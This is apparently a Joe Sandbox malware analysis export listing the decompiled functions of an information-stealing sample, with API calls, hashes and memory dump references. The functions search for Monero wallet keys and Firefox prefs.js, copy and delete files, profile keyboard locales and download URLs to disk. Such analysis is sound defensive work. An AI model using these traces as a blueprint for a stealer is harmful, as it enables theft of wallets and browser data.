Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: cc53fab817410bd0e2e857e87c0e5609bb7b4318bb8088611642a09032dea633
Instruction ID: c8ef8d9b4f2690776ff420699af3a47ef36c6eb59db9281d3c362f4eafb51f1d
Opcode Fuzzy Hash: cc53fab817410bd0e2e857e87c0e5609bb7b4318bb8088611642a09032dea633
Instruction Fuzzy Hash: 996153B2940218ABCB25EBE0EC45FEB737DBB48740F048689F54996141EB71EB85CF91

Function 003D3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 003D3EC3
FindFirstFileA.KERNEL32(?,?), ref: 003D3EDA
StrCmpCA.SHLWAPI(?,003E0FAC), ref: 003D3F08
StrCmpCA.SHLWAPI(?,003E0FB0), ref: 003D3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 003D406C
FindClose.KERNEL32(000000FF), ref: 003D4081

Strings

%s\%s, xrefs: 003D3EB7

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 741a1a249fa88509fa39483b22e44e2048f2dcf643756114d6fb40403c975574
Instruction ID: 422c059d1fb6e9e4e6b65d41dd2de2f9780e0ced1a9d78cb5e6885131ead203d
Opcode Fuzzy Hash: 741a1a249fa88509fa39483b22e44e2048f2dcf643756114d6fb40403c975574
Instruction Fuzzy Hash: 2F5157B6900318ABCB25FBB0DC85EEE737DBB44300F00858DB65996180DB75EB858F51

Function 003C60A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

InternetOpenA.WININET(003E0DF7,00000001,00000000,00000000,00000000), ref: 003C610F
StrCmpCA.SHLWAPI(?,00EBE4E0), ref: 003C6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003C618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003C61B3
InternetReadFile.WININET(?,?,00000400,?), ref: 003C61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003C620A
CloseHandle.KERNEL32(?,?,00000400), ref: 003C6249
InternetCloseHandle.WININET(?), ref: 003C6253
InternetCloseHandle.WININET(00000000), ref: 003C6260

Strings

, xrefs: 003C6139

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-2740779761
Opcode ID: b73a4be4d4fb4138b2bf6d73dc503435ae2a95a90ad9c05ba7bc9048aea1c550
Instruction ID: 6177f4507c9fc73dea90c47f6defe4dd6ea5101db8b72c2c222074b4461962f8
Opcode Fuzzy Hash: b73a4be4d4fb4138b2bf6d73dc503435ae2a95a90ad9c05ba7bc9048aea1c550
Instruction Fuzzy Hash: D3517FB1940218ABDB21DF90DD46FEE77B9EB44701F10849CB605AB2C0DB746E85CF95

Function 003CF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003E15B8,003E0D96), ref: 003CF71E
StrCmpCA.SHLWAPI(?,003E15BC), ref: 003CF76F
StrCmpCA.SHLWAPI(?,003E15C0), ref: 003CF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 003CFAB1
FindClose.KERNEL32(000000FF), ref: 003CFAC3

Strings

prefs.js, xrefs: 003CF812

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: c5b8f150acd3e4b1b6c0f0ea4af20d52058d1dcd632403f0a46b6690361c1d79
Instruction ID: 3345de863d154254b23ceea94af3391cce7b8a8f7a652b9eb76557f24622d8f0
Opcode Fuzzy Hash: c5b8f150acd3e4b1b6c0f0ea4af20d52058d1dcd632403f0a46b6690361c1d79
Instruction Fuzzy Hash: 27B157729006189BCB25FF60ED55FEE7779AF54300F408169E80A9A281EF315F49DF92

Function 003C16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003E510C,?,?,?,003E51B4,?,?,00000000,?,00000000), ref: 003C1923
StrCmpCA.SHLWAPI(?,003E525C), ref: 003C1973
StrCmpCA.SHLWAPI(?,003E5304), ref: 003C1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003C1D40
DeleteFileA.KERNEL32(00000000), ref: 003C1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 003C1E20
FindClose.KERNEL32(000000FF), ref: 003C1E32

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Strings

\*.*, xrefs: 003C17F1

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 29763619cdd4927cd4ee760df0f1bd34f9ec4079cee4dbb9bd2c1056943e5d9c
Instruction ID: 187861a5def2216e365261ac4362f22216879d9db19d9541c532ff1cc364d6e9
Opcode Fuzzy Hash: 29763619cdd4927cd4ee760df0f1bd34f9ec4079cee4dbb9bd2c1056943e5d9c
Instruction Fuzzy Hash: 041276739105589BCB17FB60ED96EEE7378AF14300F40419AB50AAA191EF306F89DF91

Function 003CDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003E14B0,003E0C2A), ref: 003CDAEB
StrCmpCA.SHLWAPI(?,003E14B4), ref: 003CDB33
StrCmpCA.SHLWAPI(?,003E14B8), ref: 003CDB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 003CDDCC
FindClose.KERNEL32(000000FF), ref: 003CDDDE

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 61282f730ce5823ccbf527a7d51810b74322ee23603daeeca6100e168949d916
Instruction ID: e14c5952567422bc7af3ac4305e320447b908dfae92eab704756c20055edb662
Opcode Fuzzy Hash: 61282f730ce5823ccbf527a7d51810b74322ee23603daeeca6100e168949d916
Instruction Fuzzy Hash: 9691487390060457CB16FBB0ED56EED777DAF84300F408669F90ADA281EE349B19DB92

Function 003D7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

GetKeyboardLayoutList.USER32(00000000,00000000,003E05AF), ref: 003D7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 003D7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 003D7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003D7C62
LocalFree.KERNEL32(00000000), ref: 003D7D22

Strings

/ , xrefs: 003D7C7F

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: e6d94aadfb750f04843b83fb118abad8d9a4613ccc3b4214615f29382cccfa8a
Instruction ID: e34149fb1f124180e0155c67342c5cda915e4328ede732f05645c2ccda4534ea
Opcode Fuzzy Hash: e6d94aadfb750f04843b83fb118abad8d9a4613ccc3b4214615f29382cccfa8a
Instruction Fuzzy Hash: 1B415072950218ABCB25DB94ED99BEEB778FF44700F20419AE40966290DB742F85CFA1

Function 003CE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003E0D73), ref: 003CE4A2
StrCmpCA.SHLWAPI(?,003E14F8), ref: 003CE4F2
StrCmpCA.SHLWAPI(?,003E14FC), ref: 003CE508
FindNextFileA.KERNEL32(000000FF,?), ref: 003CEBDF

Strings

\*.*, xrefs: 003CE44D

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
